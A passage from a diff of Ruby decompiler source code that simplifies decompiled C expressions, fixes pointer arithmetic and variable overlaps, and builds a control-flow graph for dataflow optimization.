C::CExpression[[ce.rexpr, C::Pointer.new(s)], C::Pointer.new(ce.type)] + next + end + # *structptr => structptr->member + ce.lexpr = ce.rexpr + ce.op = :'->' + ce.rexpr = m.name + ce.type = m.type + next + elsif ce.op == :'=' and ce.lexpr.type.untypedef.kind_of? C::Struct + s = ce.lexpr.type.untypedef + m = s.members.to_a.find { |m_| s.offsetof(@c_parser, m_.name) == 0 } + ce.lexpr = C::CExpression.new(ce.lexpr, :'.', m.name, m.type) + ce.type = m.type + next + end + + if ce.op == :+ and ce.lexpr and ce.lexpr.type.pointer? and not ce.type.pointer? + ce.type = ce.lexpr.type + end + + if ce.op == :& and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :* and not ce.rexpr.lexpr + ce.replace C::CExpression[ce.rexpr.rexpr] + end + + next if not ce.lexpr or not ce.lexpr.type.pointer? + if ce.op == :+ and (s = ce.lexpr.type.pointed.untypedef).kind_of? C::Union and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and + ce.rexpr.rexpr.kind_of? ::Integer and o = ce.rexpr.rexpr + # structptr + 4 => &structptr->member + ce.replace structoffset(s, ce.lexpr, o, nil) + elsif [:+, :-, :'+=', :'-='].include? ce.op and ce.rexpr.kind_of? C::CExpression and ((not ce.rexpr.op and i = ce.rexpr.rexpr) or + (ce.rexpr.op == :* and i = ce.rexpr.lexpr and ((i.kind_of? C::CExpression and not i.op and i = i.rexpr) or true))) and + i.kind_of? ::Integer and psz = sizeof(nil, ce.lexpr.type.pointed) and i % psz == 0 + # ptr += 4 => ptr += 1 + if not ce.rexpr.op + ce.rexpr.rexpr /= psz + else + ce.rexpr.lexpr.rexpr /= psz + if ce.rexpr.lexpr.rexpr == 1 + ce.rexpr = ce.rexpr.rexpr + end + end + ce.type = ce.lexpr.type + + elsif (ce.op == :+ or ce.op == :-) and sizeof(nil, ce.lexpr.type.pointed) != 1 + # ptr+x => (ptrtype*)(((__int8*)ptr)+x) + # XXX create struct ? + ce.rexpr = C::CExpression[ce.rexpr, C::BaseType.new(:int)] if not ce.rexpr.type.integral? + if sizeof(nil, ce.lexpr.type.pointed) != 1 + ptype = ce.lexpr.type + p = C::CExpression[[ce.lexpr], C::Pointer.new(C::BaseType.new(:__int8))] + ce.replace C::CExpression[[p, ce.op, ce.rexpr, p.type], ptype] + end + end + } + end + + # handling of var overlapping (eg __int32 var_10; __int8 var_F => replace all var_F by *(&var_10 + 1)) + # must be done before fix_pointer_arithmetic + def fix_type_overlap(scope) + varinfo = {} + scope.symbol.each_value { |var| + next if not off = var.stackoff + len = sizeof(var) + varinfo[var] = [off, len] + } + + varinfo.each { |v1, (o1, l1)| + next if not v1.type.integral? + varinfo.each { |v2, (o2, l2)| + # XXX o1 may overlap o2 AND another (int32 v_10; int32 v_E; int32 v_C;) + # TODO should check stuff with aliasing domains + next if v1.name == v2.name or o1 >= o2+l2 or o1+l1 <= o2 or l1 > l2 or (l2 == l1 and o2 >= o1) + # v1 => *(&v2+delta) + p = C::CExpression[:&, v2] + p = C::CExpression[p, :+, [o1-o2]] + p = C::CExpression[p, C::Pointer.new(v1.type)] if v1.type != p.type.type + p = C::CExpression[:*, p] + walk_ce(scope) { |ce| + ce.lexpr = p if ce.lexpr == v1 + ce.rexpr = p if ce.rexpr == v1 + } + } + + } + end + + # to be run with scope = function body with only CExpr/Decl/Label/Goto/IfGoto/Return, with correct variables types + # will transform += 1 to ++, inline them to prev/next statement ('++x; if (x)..' => 'if (++x)..') # remove useless variables ('int i;', i never used or 'i = 1; j = i;', i never read after => 'j = 1;') - # remove useless casts ('(int)i' with 'int i;' => 'i') - def optimize(scope) - optimize_code(scope) - optimize_vars(scope) - optimize_vars(scope) # 1st run may transform i = i+1 into i++ which second run may coalesce into if(i) - end - - # simplify cexpressions (char & 255, redundant casts, etc) - def optimize_code(scope) - return if forbid_optimize_code - - sametype = lambda { |t1, t2| - t1 = t1.untypedef - t2 = t2.untypedef - t1 = t1.pointed.untypedef if t1.pointer? and t1.pointed.untypedef.kind_of? C::Function - t2 = t2.pointed.untypedef if t2.pointer? and t2.pointed.untypedef.kind_of? C::Function - t1 == t2 or - (t1.kind_of? C::Function and t2.kind_of? C::Function and sametype[t1.type, t2.type] and t1.args.to_a.length == t2.args.to_a.length and - t1.args.to_a.zip(t2.args.to_a).all? { |st1, st2| sametype[st1.type, st2.type] }) or - (t1.kind_of? C::BaseType and t1.integral? and t2.kind_of? C::BaseType and t2.integral? and sizeof(nil, t1) == sizeof(nil, t2)) or - (t1.pointer? and t2.pointer? and sametype[t1.type, t2.type]) - } - - # most of this is a CExpr#reduce - future_array = [] - walk_ce(scope, true) { |ce| - # (whatever)0 => 0 - if not ce.op and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 - ce.replace ce.rexpr - end - - # *&bla => bla if types ok - if ce.op == :* and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :& and not ce.rexpr.lexpr and sametype[ce.rexpr.type.pointed, ce.rexpr.rexpr.type] - ce.replace C::CExpression[ce.rexpr.rexpr] - end - - # int x + 0xffffffff -> x-1 - if ce.lexpr and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and [:+, :-, :'+=', :'-=', :'!=', :==, :>, :<, :>=, :<=].include? ce.op and - ce.rexpr.rexpr == (1 << (8*sizeof(ce.lexpr)))-1 - ce.op = {:+ => :-, :- => :+, :'+=' => :'-=', :'-=' => :'+='}[ce.op] - ce.rexpr.rexpr = 1 - end - - # int *ptr; *(ptr + 4) => ptr[4] - if ce.op == :* and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :+ and var = ce.rexpr.lexpr and var.kind_of? C::Variable and var.type.pointer? - ce.lexpr, ce.op, ce.rexpr = ce.rexpr.lexpr, :'[]', ce.rexpr.rexpr - future_array << var.name - end - - # char x; x & 255 => x - if ce.op == :& and ce.lexpr and (ce.lexpr.type.integral? or ce.lexpr.type.pointer?) and ce.rexpr.kind_of? C::CExpression and - not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer and m = (1 << (8*sizeof(ce.lexpr))) - 1 and - ce.rexpr.rexpr & m == m - ce.replace C::CExpression[ce.lexpr] - end - - # a + -b => a - b - if ce.op == :+ and ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :- and not ce.rexpr.lexpr - ce.op, ce.rexpr = :-, ce.rexpr.rexpr - end - - # (((int) i >> 31) & 1) => i < 0 - if ce.op == :& and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 1 and - ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :>> and ce.lexpr.rexpr.kind_of? C::CExpression and - not ce.lexpr.rexpr.op and ce.lexpr.rexpr.rexpr == sizeof(ce.lexpr.lexpr) * 8 - 1 - ce.replace C::CExpression[ce.lexpr.lexpr, :<, [0]] - end - - # a-b == 0 => a == b - if ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 and [:==, :'!=', :<, :>, :<=, :>=].include? ce.op and - ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :- and ce.lexpr.lexpr - ce.lexpr, ce.rexpr = ce.lexpr.lexpr, ce.lexpr.rexpr - end - - # (a > 0) != 0 - if ce.op == :'!=' and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 and ce.lexpr.kind_of? C::CExpression and - [:<, :<=, :>, :>=, :'==', :'!=', :'!'].include? ce.lexpr.op - ce.replace ce.lexpr - end - - # (a < b) != ( [(a < 0) == !(b < 0)] && [(a < 0) != (a < b)] ) => jl - # a true if !r => a<0 == b<0 or a>=0 => a>=0 or b>=0 - # a>=b => true if r => a<0 == b>=0 and a<0 => a<0 and b>=0 - - # x != (a && (b != x)) => [x && (!a || b)] || [!x && !(!a || b)] - if ce.op == :'!=' and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :< and ce.rexpr.kind_of? C::CExpression and - ce.rexpr.op == :'&&' and ce.rexpr.rexpr.kind_of? C::CExpression and ce.rexpr.rexpr.op == :'!=' and - ce.rexpr.rexpr.rexpr == ce.lexpr and not walk_ce(ce) { |ce_| break true if ce_.op == :funcall } - x, a, b = ce.lexpr, ce.rexpr.lexpr, ce.rexpr.rexpr.lexpr - ce.replace C::CExpression[ [x, :'&&', [[:'!',a],:'||',b]] , :'||', [[:'!', x], :'&&', [:'!', [[:'!',a],:'||',b]]] ] - optimize_code(ce) - end - # (a != b) || a => a || b - if ce.op == :'||' and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :'!=' and ce.lexpr.lexpr == ce.rexpr and not walk_ce(ce) { |ce_| break true if ce_.op == :funcall } - ce.lexpr, ce.rexpr = ce.rexpr, ce.lexpr.rexpr - optimize_code(ce) - end - # (a=0 && b<0) || (a>=b) && (a>=0 && b<0) => (signed)a < (signed)b - if ce.op == :'||' and ce.lexpr.kind_of? C::CExpression and ce.rexpr.kind_of? C::CExpression and ce.lexpr.op == :'&&' and ce.rexpr.op == :'&&' and - ce.lexpr.lexpr.kind_of? C::CExpression and ce.lexpr.lexpr.op == :< - a, b = ce.lexpr.lexpr.lexpr, ce.lexpr.lexpr.rexpr - if ce.lexpr.rexpr === C::CExpression[[a, :'>=', [0]], :'&&', [b, :'<', [0]]].negate and - ce.rexpr.lexpr === ce.lexpr.lexpr.negate and ce.rexpr.rexpr === ce.lexpr.rexpr.negate - ce.replace C::CExpression[a, :'<', b] - end - end - # a && 1 - if (ce.op == :'||' or ce.op == :'&&') and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer - if ((ce.op == :'||' and ce.rexpr.rexpr == 0) or (ce.op == :'&&' and ce.rexpr.rexpr != 0)) - ce.replace C::CExpression[ce.lexpr] - elsif not walk_ce(ce) { |ce_| break true if ce.op == :funcall } # cannot wipe if sideeffect - ce.replace C::CExpression[[ce.op == :'||' ? 1 : 0]] - end - end - # (b < c || b >= c) - if (ce.op == :'||' or ce.op == :'&&') and C::CExpression.negate(ce.lexpr) == C::CExpression[ce.rexpr] - ce.replace C::CExpression[[(ce.op == :'||') ? 1 : 0]] - end - - # (a < b) | (a == b) => a <= b - if ce.op == :| and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :== and ce.lexpr.kind_of? C::CExpression and - (ce.lexpr.op == :< or ce.lexpr.op == :>) and ce.lexpr.lexpr == ce.rexpr.lexpr and ce.lexpr.rexpr == ce.rexpr.rexpr - ce.op = {:< => :<=, :> => :>=}[ce.lexpr.op] - ce.lexpr, ce.rexpr = ce.lexpr.lexpr, ce.lexpr.rexpr - end - - # a == 0 => !a - if ce.op == :== and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 - ce.lexpr, ce.op, ce.rexpr = nil, :'!', ce.lexpr - end - - if ce.op == :'!' and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer - ce.replace C::CExpression[[ce.rexpr.rexpr == 0 ? 1 : 0]] - end - - # !(bool) => bool - if ce.op == :'!' and ce.rexpr.kind_of? C::CExpression and [:'==', :'!=', :<, :>, :<=, :>=, :'||', :'&&', :'!'].include? ce.rexpr.op - ce.replace ce.rexpr.negate - end - - # (foo)(bar)x => (foo)x - if not ce.op and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? C::CExpression - ce.rexpr = ce.rexpr.rexpr - end - - # &struct.1stmember => &struct - if ce.op == :& and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :'.' and s = ce.rexpr.lexpr.type and - s.kind_of? C::Union and s.offsetof(@c_parser, ce.rexpr.rexpr) == 0 - ce.rexpr = ce.rexpr.lexpr - ce.type = C::Pointer.new(ce.rexpr.type) - end - - # (1stmember*)structptr => &structptr->1stmember - if not ce.op and ce.type.pointer? and not ce.type.pointed.void? and ce.rexpr.kind_of? C::Typed and ce.rexpr.type.pointer? and - s = ce.rexpr.type.pointed.untypedef and s.kind_of? C::Union and ce.type.pointed.untypedef != s - ce.rexpr = C::CExpression[structoffset(s, ce.rexpr, 0, sizeof(ce.type.pointed))] - #ce.replace ce.rexpr if not ce.type.pointed.untypedef.kind_of? C::Function or (ce.rexpr.type.pointer? and - #ce.rexpr.type.pointed.untypedef.kind_of? C::Function) # XXX ugly - # int32* v1 = (int32*)pstruct; - # z = v1+4 if v1 is not cast, the + is invalid (sizeof pointed changes) - # TODO when finding type of pstruct, set type of v1 accordingly - end - - # (&foo)->bar => foo.bar - if ce.op == :'->' and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :& and not ce.lexpr.lexpr - ce.lexpr = ce.lexpr.rexpr - ce.op = :'.' - end - - # (foo)bla => bla if bla of type foo - if not ce.op and ce.rexpr.kind_of? C::Typed and sametype[ce.type, ce.rexpr.type] - ce.replace C::CExpression[ce.rexpr] - end - if ce.lexpr.kind_of? C::CExpression and not ce.lexpr.op and ce.lexpr.rexpr.kind_of? C::Variable and ce.lexpr.type == ce.lexpr.rexpr.type - ce.lexpr = ce.lexpr.rexpr - end - - if ce.op == :'=' and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :* and not ce.lexpr.lexpr and ce.lexpr.rexpr.kind_of? C::CExpression and - not ce.lexpr.rexpr.op and ce.lexpr.rexpr.type.pointer? and ce.lexpr.rexpr.type.pointed != ce.rexpr.type - ce.lexpr.rexpr.type = C::Pointer.new(ce.rexpr.type) - optimize_code(ce.lexpr) - end - } - - # if there is a ptr[4], change all *ptr to ptr[0] for consistency - # do this after the first pass, which may change &*ptr to ptr - walk_ce(scope) { |ce| - if ce.op == :* and not ce.lexpr and ce.rexpr.kind_of? C::Variable and future_array.include? ce.rexpr.name - ce.lexpr, ce.op, ce.rexpr = ce.rexpr, :'[]', C::CExpression[0] - end - } if not future_array.empty? - - # if (x != 0) => if (x) - walk(scope) { |st| - if st.kind_of? C::If and st.test.kind_of? C::CExpression and st.test.op == :'!=' and - st.test.rexpr.kind_of? C::CExpression and not st.test.rexpr.op and st.test.rexpr.rexpr == 0 - st.test = C::CExpression[st.test.lexpr] - end - } - end - - # checks if an expr has sideeffects (funcall, var assignment, mem dereference, use var out of scope if specified) - def sideeffect(exp, scope=nil) - case exp - when nil, ::Numeric, ::String; false - when ::Array; exp.any? { |_e| sideeffect _e, scope } - when C::Variable; (scope and not scope.symbol[exp.name]) or exp.type.qualifier.to_a.include? :volatile - when C::CExpression; (exp.op == :* and not exp.lexpr) or exp.op == :funcall or AssignOp.include?(exp.op) or - sideeffect(exp.lexpr, scope) or sideeffect(exp.rexpr, scope) - else true # failsafe - end - end - - # converts C code to a graph of cexprs (nodes = cexprs, edges = codepaths) - # returns a CGraph - class CGraph - # exprs: label => [exprs], to: label => [labels], block: label => are exprs standalone (vs If#test), start: 1st label - attr_accessor :exprs, :to, :block, :start, :to_optim, :from_optim - end - def c_to_graph(st) - g = CGraph.new - g.exprs = {} # label => [exprs] - g.to = {} # label => [labels] - g.block = {} # label => is label in a block? (vs If#test) - anon_label = 0 # when no label is there, use anon_label++ - # converts C code to a graph of codepath of cexprs - to_graph = lambda { |stmt, l_cur, l_after, l_cont, l_break| - case stmt - when C::Label; g.to[l_cur] = [stmt.name] ; g.to[stmt.name] = [l_after] - when C::Goto; g.to[l_cur] = [stmt.target] - when C::Continue; g.to[l_cur] = [l_cont] - when C::Break; g.to[l_cur] = [l_break] - when C::CExpression - g.exprs[l_cur] = [stmt] - g.to[l_cur] = [l_after] - when C::Return - g.exprs[l_cur] = [stmt.value] if stmt.value - g.to[l_cur] = [] - when C::Block - to_graph[stmt.statements, l_cur, l_after, l_cont, l_break] - when ::Array - g.exprs[l_cur] = [] - g.block[l_cur] = true - stmt.each_with_index { |s, i| - case s - when C::Declaration - when C::CExpression - g.exprs[l_cur] << s - else - l = anon_label += 1 - ll = anon_label += 1 - g.to[l_cur] = [l] - g.block[l_cur] = true - to_graph[stmt[i], l, ll, l_cont, l_break] - l_cur = ll - g.exprs[l_cur] = [] - end - } - g.to[l_cur] = [l_after].compact - when C::If - g.exprs[l_cur] = [stmt.test] - lt = anon_label += 1 - to_graph[stmt.bthen, lt, l_after, l_cont, l_break] - le = anon_label += 1 - to_graph[stmt.belse, le, l_after, l_cont, l_break] - g.to[l_cur] = [lt, le] - when C::While, C::DoWhile - la = anon_label += 1 - if stmt.kind_of? C::DoWhile - lt, lb = la, l_cur - else - lt, lb = l_cur, la - end - g.exprs[lt] = [stmt.test] - g.to[lt] = [lb, l_after] - to_graph[stmt.body, lb, lt, lt, l_after] - when C::Asm, nil; g.to[l_cur] = [l_after] - else puts "to_graph unhandled #{stmt.class}: #{stmt}" if $VERBOSE - end - } - - g.start = anon_label - to_graph[st, g.start, nil, nil, nil] - - # optimize graph - g.to_optim = {} - g.to.each { |k, v| g.to_optim[k] = v.uniq } - g.exprs.delete_if { |k, v| v == [] } - g.to_optim.delete_if { |k, v| - if v.length == 1 and not g.exprs[k] and v != [k] - g.to_optim.each_value { |t| if i = t.index(k) ; t[i] = v.first ; end } - true - elsif v.length == 0 and not g.exprs[k] - g.to_optim.each_value { |t| t.delete k } - true - end - } - - g.from_optim = {} - g.to_optim.each { |k, v| v.each { |t| (g.from_optim[t] ||= []) << k } } - - g - end - - # dataflow optimization - # condenses expressions (++x; if (x) => if (++x)) - # remove local var assignment (x = 1; f(x); x = 2; g(x); => f(1); g(2); etc) - def optimize_vars(scope) - return if forbid_optimize_dataflow - - g = c_to_graph(scope) - - # walks a cexpr in evaluation order (not strictly, but this is not strictly defined anyway..) - # returns the first subexpr to read var in ce - # returns :write if var is rewritten - # returns nil if var not read - # may return a cexpr var += 2 - find_next_read_ce = lambda { |ce_, var| - walk_ce(ce_, true) { |ce| - case ce.op - when :funcall - break ce if ce.lexpr == var or ce.rexpr.find { |a| a == var } - when :'=' - # a=a / a=a+1 => yield a, not :write - break ce if ce.rexpr == var - break :write if ce.lexpr == var - else - break ce if ce.lexpr == var or ce.rexpr == var - end - } - } - - # badlabels is a list of labels that may be reached without passing through the first invocation block - find_next_read_rec = lambda { |label, idx, var, done, badlabels| - next if done.include? label - done << label if idx == 0 - - idx += 1 while ce = g.exprs[label].to_a[idx] and not ret = find_next_read_ce[ce, var] - next ret if ret - - to = g.to_optim[label].to_a.map { |t| - break [:split] if badlabels.include? t - find_next_read_rec[t, 0, var, done, badlabels] - }.compact - - tw = to - [:write] + # remove useless casts ('(int)i' with 'int i;' => 'i') + def optimize(scope) + optimize_code(scope) + optimize_vars(scope) + optimize_vars(scope) # 1st run may transform i = i+1 into i++ which second run may coalesce into if(i) + end + + # simplify cexpressions (char & 255, redundant casts, etc) + def optimize_code(scope) + return if forbid_optimize_code + + sametype = lambda { |t1, t2| + t1 = t1.untypedef + t2 = t2.untypedef + t1 = t1.pointed.untypedef if t1.pointer? and t1.pointed.untypedef.kind_of? C::Function + t2 = t2.pointed.untypedef if t2.pointer? and t2.pointed.untypedef.kind_of? C::Function + t1 == t2 or + (t1.kind_of? C::Function and t2.kind_of? C::Function and sametype[t1.type, t2.type] and t1.args.to_a.length == t2.args.to_a.length and + t1.args.to_a.zip(t2.args.to_a).all? { |st1, st2| sametype[st1.type, st2.type] }) or + (t1.kind_of? C::BaseType and t1.integral? and t2.kind_of? C::BaseType and t2.integral? and sizeof(nil, t1) == sizeof(nil, t2)) or + (t1.pointer? and t2.pointer? and sametype[t1.type, t2.type]) + } + + # most of this is a CExpr#reduce + future_array = [] + walk_ce(scope, true) { |ce| + # (whatever)0 => 0 + if not ce.op and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 + ce.replace ce.rexpr + end + + # *&bla => bla if types ok + if ce.op == :* and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :& and not ce.rexpr.lexpr and sametype[ce.rexpr.type.pointed, ce.rexpr.rexpr.type] + ce.replace C::CExpression[ce.rexpr.rexpr] + end + + # int x + 0xffffffff -> x-1 + if ce.lexpr and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and [:+, :-, :'+=', :'-=', :'!=', :==, :>, :<, :>=, :<=].include? ce.op and + ce.rexpr.rexpr == (1 << (8*sizeof(ce.lexpr)))-1 + ce.op = {:+ => :-, :- => :+, :'+=' => :'-=', :'-=' => :'+='}[ce.op] + ce.rexpr.rexpr = 1 + end + + # int *ptr; *(ptr + 4) => ptr[4] + if ce.op == :* and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :+ and var = ce.rexpr.lexpr and var.kind_of? C::Variable and var.type.pointer? + ce.lexpr, ce.op, ce.rexpr = ce.rexpr.lexpr, :'[]', ce.rexpr.rexpr + future_array << var.name + end + + # char x; x & 255 => x + if ce.op == :& and ce.lexpr and (ce.lexpr.type.integral? or ce.lexpr.type.pointer?) and ce.rexpr.kind_of? C::CExpression and + not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer and m = (1 << (8*sizeof(ce.lexpr))) - 1 and + ce.rexpr.rexpr & m == m + ce.replace C::CExpression[ce.lexpr] + end + + # a + -b => a - b + if ce.op == :+ and ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :- and not ce.rexpr.lexpr + ce.op, ce.rexpr = :-, ce.rexpr.rexpr + end + + # (((int) i >> 31) & 1) => i < 0 + if ce.op == :& and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 1 and + ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :>> and ce.lexpr.rexpr.kind_of? C::CExpression and + not ce.lexpr.rexpr.op and ce.lexpr.rexpr.rexpr == sizeof(ce.lexpr.lexpr) * 8 - 1 + ce.replace C::CExpression[ce.lexpr.lexpr, :<, [0]] + end + + # a-b == 0 => a == b + if ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 and [:==, :'!=', :<, :>, :<=, :>=].include? ce.op and + ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :- and ce.lexpr.lexpr + ce.lexpr, ce.rexpr = ce.lexpr.lexpr, ce.lexpr.rexpr + end + + # (a > 0) != 0 + if ce.op == :'!=' and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 and ce.lexpr.kind_of? C::CExpression and + [:<, :<=, :>, :>=, :'==', :'!=', :'!'].include? ce.lexpr.op + ce.replace ce.lexpr + end + + # (a < b) != ( [(a < 0) == !(b < 0)] && [(a < 0) != (a < b)] ) => jl + # a true if !r => a<0 == b<0 or a>=0 => a>=0 or b>=0 + # a>=b => true if r => a<0 == b>=0 and a<0 => a<0 and b>=0 + + # x != (a && (b != x)) => [x && (!a || b)] || [!x && !(!a || b)] + if ce.op == :'!=' and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :< and ce.rexpr.kind_of? C::CExpression and + ce.rexpr.op == :'&&' and ce.rexpr.rexpr.kind_of? C::CExpression and ce.rexpr.rexpr.op == :'!=' and + ce.rexpr.rexpr.rexpr == ce.lexpr and not walk_ce(ce) { |ce_| break true if ce_.op == :funcall } + x, a, b = ce.lexpr, ce.rexpr.lexpr, ce.rexpr.rexpr.lexpr + ce.replace C::CExpression[ [x, :'&&', [[:'!',a],:'||',b]] , :'||', [[:'!', x], :'&&', [:'!', [[:'!',a],:'||',b]]] ] + optimize_code(ce) + end + # (a != b) || a => a || b + if ce.op == :'||' and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :'!=' and ce.lexpr.lexpr == ce.rexpr and not walk_ce(ce) { |ce_| break true if ce_.op == :funcall } + ce.lexpr, ce.rexpr = ce.rexpr, ce.lexpr.rexpr + optimize_code(ce) + end + # (a=0 && b<0) || (a>=b) && (a>=0 && b<0) => (signed)a < (signed)b + if ce.op == :'||' and ce.lexpr.kind_of? C::CExpression and ce.rexpr.kind_of? C::CExpression and ce.lexpr.op == :'&&' and ce.rexpr.op == :'&&' and + ce.lexpr.lexpr.kind_of? C::CExpression and ce.lexpr.lexpr.op == :< + a, b = ce.lexpr.lexpr.lexpr, ce.lexpr.lexpr.rexpr + if ce.lexpr.rexpr === C::CExpression[[a, :'>=', [0]], :'&&', [b, :'<', [0]]].negate and + ce.rexpr.lexpr === ce.lexpr.lexpr.negate and ce.rexpr.rexpr === ce.lexpr.rexpr.negate + ce.replace C::CExpression[a, :'<', b] + end + end + # a && 1 + if (ce.op == :'||' or ce.op == :'&&') and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer + if ((ce.op == :'||' and ce.rexpr.rexpr == 0) or (ce.op == :'&&' and ce.rexpr.rexpr != 0)) + ce.replace C::CExpression[ce.lexpr] + elsif not walk_ce(ce) { |ce_| break true if ce.op == :funcall } # cannot wipe if sideeffect + ce.replace C::CExpression[[ce.op == :'||' ? 1 : 0]] + end + end + # (b < c || b >= c) + if (ce.op == :'||' or ce.op == :'&&') and C::CExpression.negate(ce.lexpr) == C::CExpression[ce.rexpr] + ce.replace C::CExpression[[(ce.op == :'||') ? 1 : 0]] + end + + # (a < b) | (a == b) => a <= b + if ce.op == :| and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :== and ce.lexpr.kind_of? C::CExpression and + (ce.lexpr.op == :< or ce.lexpr.op == :>) and ce.lexpr.lexpr == ce.rexpr.lexpr and ce.lexpr.rexpr == ce.rexpr.rexpr + ce.op = {:< => :<=, :> => :>=}[ce.lexpr.op] + ce.lexpr, ce.rexpr = ce.lexpr.lexpr, ce.lexpr.rexpr + end + + # a == 0 => !a + if ce.op == :== and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr == 0 + ce.lexpr, ce.op, ce.rexpr = nil, :'!', ce.lexpr + end + + if ce.op == :'!' and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? ::Integer + ce.replace C::CExpression[[ce.rexpr.rexpr == 0 ? 1 : 0]] + end + + # !(bool) => bool + if ce.op == :'!' and ce.rexpr.kind_of? C::CExpression and [:'==', :'!=', :<, :>, :<=, :>=, :'||', :'&&', :'!'].include? ce.rexpr.op + ce.replace ce.rexpr.negate + end + + # (foo)(bar)x => (foo)x + if not ce.op and ce.rexpr.kind_of? C::CExpression and not ce.rexpr.op and ce.rexpr.rexpr.kind_of? C::CExpression + ce.rexpr = ce.rexpr.rexpr + end + + # &struct.1stmember => &struct + if ce.op == :& and not ce.lexpr and ce.rexpr.kind_of? C::CExpression and ce.rexpr.op == :'.' and s = ce.rexpr.lexpr.type and + s.kind_of? C::Union and s.offsetof(@c_parser, ce.rexpr.rexpr) == 0 + ce.rexpr = ce.rexpr.lexpr + ce.type = C::Pointer.new(ce.rexpr.type) + end + + # (1stmember*)structptr => &structptr->1stmember + if not ce.op and ce.type.pointer? and not ce.type.pointed.void? and ce.rexpr.kind_of? C::Typed and ce.rexpr.type.pointer? and + s = ce.rexpr.type.pointed.untypedef and s.kind_of? C::Union and ce.type.pointed.untypedef != s + ce.rexpr = C::CExpression[structoffset(s, ce.rexpr, 0, sizeof(ce.type.pointed))] + #ce.replace ce.rexpr if not ce.type.pointed.untypedef.kind_of? C::Function or (ce.rexpr.type.pointer? and + #ce.rexpr.type.pointed.untypedef.kind_of? C::Function) # XXX ugly + # int32* v1 = (int32*)pstruct; + # z = v1+4 if v1 is not cast, the + is invalid (sizeof pointed changes) + # TODO when finding type of pstruct, set type of v1 accordingly + end + + # (&foo)->bar => foo.bar + if ce.op == :'->' and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :& and not ce.lexpr.lexpr + ce.lexpr = ce.lexpr.rexpr + ce.op = :'.' + end + + # (foo)bla => bla if bla of type foo + if not ce.op and ce.rexpr.kind_of? C::Typed and sametype[ce.type, ce.rexpr.type] + ce.replace C::CExpression[ce.rexpr] + end + if ce.lexpr.kind_of? C::CExpression and not ce.lexpr.op and ce.lexpr.rexpr.kind_of? C::Variable and ce.lexpr.type == ce.lexpr.rexpr.type + ce.lexpr = ce.lexpr.rexpr + end + + if ce.op == :'=' and ce.lexpr.kind_of? C::CExpression and ce.lexpr.op == :* and not ce.lexpr.lexpr and ce.lexpr.rexpr.kind_of? C::CExpression and + not ce.lexpr.rexpr.op and ce.lexpr.rexpr.type.pointer? and ce.lexpr.rexpr.type.pointed != ce.rexpr.type + ce.lexpr.rexpr.type = C::Pointer.new(ce.rexpr.type) + optimize_code(ce.lexpr) + end + } + + # if there is a ptr[4], change all *ptr to ptr[0] for consistency + # do this after the first pass, which may change &*ptr to ptr + walk_ce(scope) { |ce| + if ce.op == :* and not ce.lexpr and ce.rexpr.kind_of? C::Variable and future_array.include? ce.rexpr.name + ce.lexpr, ce.op, ce.rexpr = ce.rexpr, :'[]', C::CExpression[0] + end + } if not future_array.empty? + + # if (x != 0) => if (x) + walk(scope) { |st| + if st.kind_of? C::If and st.test.kind_of? C::CExpression and st.test.op == :'!=' and + st.test.rexpr.kind_of? C::CExpression and not st.test.rexpr.op and st.test.rexpr.rexpr == 0 + st.test = C::CExpression[st.test.lexpr] + end + } + end + + # checks if an expr has sideeffects (funcall, var assignment, mem dereference, use var out of scope if specified) + def sideeffect(exp, scope=nil) + case exp + when nil, ::Numeric, ::String; false + when ::Array; exp.any? { |_e| sideeffect _e, scope } + when C::Variable; (scope and not scope.symbol[exp.name]) or exp.type.qualifier.to_a.include? :volatile + when C::CExpression; (exp.op == :* and not exp.lexpr) or exp.op == :funcall or AssignOp.include?(exp.op) or + sideeffect(exp.lexpr, scope) or 